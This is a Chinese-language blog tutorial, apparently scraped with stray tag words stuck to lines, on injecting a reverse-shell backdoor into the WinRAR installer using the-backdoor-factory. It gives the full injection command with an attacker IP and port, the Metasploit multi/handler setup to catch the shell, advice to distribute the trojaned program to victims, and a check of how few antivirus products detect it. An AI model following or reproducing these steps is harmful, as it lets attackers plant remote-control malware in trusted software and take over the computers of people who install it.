後門

咱們的網絡不安全
https://www.youtube.com/watch?v=nJF9OTscFiQhtml

此次咱們用到的程序叫backdoor-factory,爲完整的程序注入後門程序。具體的請網上查看。linux

在kali linux系統上集成了該程序,可是注入後的程序顯示爲空文件(大小爲0).故在ubuntu上手動安裝嘗試了一下,看咱們的網絡是否夠安全。git

注入

1.下載程序

git clone https://github.com/secretsquirrel/the-backdoor-factory.git

2.安裝

sudo chmod +x ./install.sh

3.運行

sudo ./backdoor.py

4.選擇目標文件

本次使用的軟件爲 https://rarlab.com/rar/winrar-x64-561.exe
以後將在此程序中注入後門github

執行 ./babackdoor.py -f winrar-x64-561.exe -S
能夠看到此程序支持代碼注入

執行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪幾種注入方式
shell

5.開始注入

執行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234ubuntu

reverse_shell_tcp_inline 注入方式
172.17.170.38 攻擊者ip,以後受害者主機來訪問該ip
1234 攻擊者端口,以後受害者主機來訪問該端口windows

選擇注入的位置:安全


均可以,這裏咱們選擇2

完成。能夠在指定目錄下找到該文件。
到這裏就注入完成了。服務器

控制

服務器等待中招的pc鏈接。
設置服務器。打開kali linux系統。網絡

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit

將注入好的程序散發出去。若是有計算機不幸中招。
當有中招的pc代開注入後門的程序後,服務器端會有響應。

能夠看到172.17.172.223連入服務器。這時候,你就能夠全權控制223這臺主機了。

能夠看到被控制的主機信息。(編碼格式可能不對,出現亂碼)

測試

對於注入後門程序的程序,會不會成功被檢測到呢。我用的火絨殺毒,雙擊以後立馬報警。

對於其餘殺毒軟件看看什麼狀況,能夠看到可以查殺到此後門的殺毒軟件並很少。

實際上,該程序官網下載的源文件也可能會被誤殺


殺毒能夠參考網站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/

參考

利用BDF向EXE文件植入後門

Backdoor factory – How to inject shell-code into windows application

Kali Linux 滲透測試 博客記錄

相關文章
相關標籤/搜索